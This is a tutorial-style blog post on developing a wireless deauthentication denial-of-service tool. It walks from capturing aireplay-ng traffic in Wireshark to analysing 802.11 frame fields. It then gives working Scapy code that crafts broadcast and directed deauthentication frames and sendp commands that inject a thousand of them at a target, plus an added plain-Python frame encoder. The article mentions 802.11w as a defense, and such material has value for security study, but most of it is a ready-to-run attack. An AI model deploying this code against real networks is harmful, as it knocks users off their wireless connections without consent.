Developing Attack Tools – Scapy

In this article I will walk through the process of developing an attack tool. As an example, we will develop a wireless network DoS (deauthentication) tool, following these steps:

  1. How does it work?
  2. Run an existing attack tool to obtain sample packets
  3. Capture the traffic with Wireshark for analysis
  4. Export the specific packets from Wireshark for detailed analysis
  5. Import the exported packets into the Scapy console for analysis
  6. Analyze the packets for detailed information
  7. Craft a packet with Scapy
  8. Send packets to the target


How does it work?

First we have to answer this question, because if you do not know how a system works, you cannot develop an attack or a defense for it. For this example the question is:

  • How does a client's connection to the access point get broken?

Answer: by a deauthentication frame. In 802.11 a client's association is torn down by a deauthentication management frame, and without 802.11w (Protected Management Frames) these frames are neither encrypted nor authenticated. Anyone who can inject frames carrying the AP's BSSID as the source address can therefore disconnect the AP's clients at will; on a network that enforces 802.11w the forged frames are discarded, which is the defense.


Run an attack tool to obtain sample packets (reverse engineering)

We now need real examples of these packets, so this step is actually a reverse-engineering step: we run an existing tool, aireplay-ng, in its deauthentication mode (--deauth), giving it the AP's BSSID with -a and, for a directed attack, the client's MAC address with -c, and record what it puts on the air.

We need two types of packet for this process:

  1. Broadcast deauthentication packets (addr1 = ff:ff:ff:ff:ff:ff, aimed at every client of the AP)
  2. Non-broadcast (directed) deauthentication packets, aimed at one specific client

~ Broadcast

~ Not broadcast


Capture traffic with Wireshark for analysis / Export specific packets

While aireplay-ng is running, we capture the traffic with Wireshark on an interface in monitor mode. The display filter wlan.fc.type_subtype == 0x0c shows only deauthentication frames (management type 0, subtype 12). After capturing, we export just these packets from the main menu of Wireshark by following the path File -> Export Specified Packets and choosing "Displayed" so that the filter is applied to the export.


Import the exported packets into the Scapy console for analysis

In the Scapy shell we load the exported file with the rdpcap function and inspect a packet's layers with its show() method. Each deauthentication frame consists of three layers: RadioTap (the capture/injection header added by the driver, not transmitted on the air), Dot11 (the 802.11 management header: frame control, duration, addr1 to addr4 and sequence control) and Dot11Deauth (a two-byte reason code). The interesting part is the address fields. In a management frame addr1 is the receiver (destination), addr2 the transmitter (source) and addr3 the BSSID; addr4 exists only in four-address (WDS) frames, so here it is None.

Detailed information for deauthentication packets (layers)

~ Broadcast (sent in the AP's name to all clients)

addr1 = Destination (ff:ff:ff:ff:ff:ff)
addr2 = Source (the BSSID)
addr3 = Source (the BSSID)
addr4 = None

~ Not broadcast (sent in the client's name to the AP)

addr1 = Destination (the BSSID)
addr2 = Source (the client's MAC address)
addr3 = Destination (the BSSID)
addr4 = None

In both cases addr3 is simply the BSSID; it reads as "source" in the first frame and as "destination" in the second only because of who the frame claims to come from. For a directed attack aireplay-ng sends deauthentication frames in both directions, so the mirror of the second frame (addr1 = client, addr2 = addr3 = BSSID) also appears in the capture.


Craft a packet with Scapy

With the fields understood, building the frames is a one-liner per type. The values below are placeholders: bssid is the AP's BSSID and client is the target's MAC address (both as reported by airodump-ng). Dot11Deauth() defaults to reason code 1 (unspecified); aireplay-ng uses reason 7.

from scapy.all import RadioTap, Dot11, Dot11Deauth
bssid = "00:11:22:33:44:55"   # AP BSSID (placeholder)
client = "66:77:88:99:aa:bb"  # target client (placeholder)
broad = "ff:ff:ff:ff:ff:ff"   # 802.11 broadcast address

broadcast = RadioTap() / Dot11(addr1=broad, addr2=bssid.lower(), addr3=bssid.lower()) / Dot11Deauth()

direct = RadioTap() / Dot11(addr1=bssid.lower(), addr2=client.lower(), addr3=bssid.lower()) / Dot11Deauth()
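As an added example (not code from the original post), here is a plain-Python encoder and decoder for the frames analyzed above and crafted here. It reproduces the bytes that Dot11(addr1, addr2, addr3)/Dot11Deauth(reason) would emit and reads them back into the same addr1/addr2/addr3/reason fields, so it runs without Scapy installed and shows the on-the-wire layout the two Scapy one-liners hide. The MAC addresses and the sample "capture" are constructed placeholders; on a real system the resulting bytes (or the equivalent Scapy packet) still have to be handed to sendp on a monitor-mode interface.

```python
"""Encoder/decoder for 802.11 deauthentication frames in plain Python.
Field names mirror Scapy's Dot11 / Dot11Deauth layers."""
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
MGMT_TYPE = 0                # frame control type 0 = management
DEAUTH_SUBTYPE = 12          # subtype 0x0c = deauthentication (wlan.fc.type_subtype == 0x0c)
REASON_CLASS3_NONASSOC = 7   # "Class 3 frame received from nonassociated STA" (aireplay-ng's code)
REASON_NAMES = {
    1: "Unspecified reason",
    3: "Deauthenticated because sending STA is leaving",
    6: "Class 2 frame received from nonauthenticated STA",
    7: "Class 3 frame received from nonassociated STA",
}


def mac_to_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(addr1, addr2, addr3, reason=REASON_CLASS3_NONASSOC, seq=0):
    """Bytes Scapy would produce for Dot11(addr1, addr2, addr3) / Dot11Deauth(reason).
    No RadioTap header and no FCS: the injecting driver adds both."""
    frame_control = bytes([(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0x00])  # 0xc0 0x00
    duration = struct.pack("<H", 0)
    seq_control = struct.pack("<H", (seq & 0x0FFF) << 4)  # 12-bit sequence number, fragment 0
    header = (frame_control + duration + mac_to_bytes(addr1) + mac_to_bytes(addr2)
              + mac_to_bytes(addr3) + seq_control)
    return header + struct.pack("<H", reason)  # the whole body is the 2-byte reason code


def parse_deauth(frame):
    """Decode a raw deauthentication frame into the fields Scapy's show() displays."""
    if len(frame) < 26:
        raise ValueError("frame too short for a deauthentication frame")
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, fc0 >> 4
    if version != 0 or ftype != MGMT_TYPE or subtype != DEAUTH_SUBTYPE:
        raise ValueError(f"not a deauthentication frame (type={ftype}, subtype={subtype})")
    addr1 = bytes_to_mac(frame[4:10])    # receiver / destination
    addr2 = bytes_to_mac(frame[10:16])   # transmitter / source
    addr3 = bytes_to_mac(frame[16:22])   # BSSID (management frames carry no addr4)
    seq = struct.unpack("<H", frame[22:24])[0] >> 4
    reason = struct.unpack("<H", frame[24:26])[0]
    return {
        "addr1": addr1, "addr2": addr2, "addr3": addr3, "addr4": None,
        "seq": seq, "reason": reason,
        "reason_name": REASON_NAMES.get(reason, "Reserved/unknown"),
        "broadcast": addr1 == BROADCAST,
        "from_ap": addr2 == addr3,  # addr2 == BSSID: frame claims to come from the AP itself
    }


def deauth_frames(bssid, client=None, reason=REASON_CLASS3_NONASSOC):
    """Frames for one round: broadcast in the AP's name when no client is given,
    otherwise both directions (AP -> client and client -> AP), as aireplay-ng sends."""
    bssid = bssid.lower()
    if client is None:
        return [build_deauth(BROADCAST, bssid, bssid, reason)]
    client = client.lower()
    return [
        build_deauth(client, bssid, bssid, reason),   # in the AP's name, to the client
        build_deauth(bssid, client, bssid, reason),   # in the client's name, to the AP
    ]


# Constructed sample "capture" (placeholder MACs): a broadcast deauth with reason 7 and
# duration 0x013a, written little-endian as on the wire.
SAMPLE_BROADCAST = bytes.fromhex(
    "c000" "3a01" "ffffffffffff" "001122334455" "001122334455" "0000" "0700"
)

if __name__ == "__main__":
    print(parse_deauth(SAMPLE_BROADCAST))
    for f in deauth_frames("00:11:22:33:44:55", "66:77:88:99:aa:bb"):
        print(parse_deauth(f))
```

Decoding the constructed capture yields the same picture as the Scapy analysis: addr1 broadcast, addr2 and addr3 both the BSSID, reason 7. Building the directed pair and decoding it back shows why the "Not broadcast" table lists addr3 as the destination: in the client-to-AP frame addr1 and addr3 are both the BSSID, while addr2 carries the client's address.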


Send packet(s) to target(s)

Finally, we send the packets we created to the destination 🙂 sendp injects at layer 2 (the RadioTap header tells the driver how to transmit the frame), so wlan0 must be in monitor mode and the driver must support injection. count=1000 sends a thousand frames, inter=.2 spaces them 200 ms apart, and verbose=False silences the per-packet output. Against a network that enforces 802.11w the frames are transmitted but ignored by the clients.

Direct

sendp(direct, iface='wlan0', count=1000, inter=.2, verbose=False)

Broadcast

sendp(broadcast, iface='wlan0', count=1000, inter=.2, verbose=False)

 

Source code

Besim ALTINOK

Cyber Security Researcher
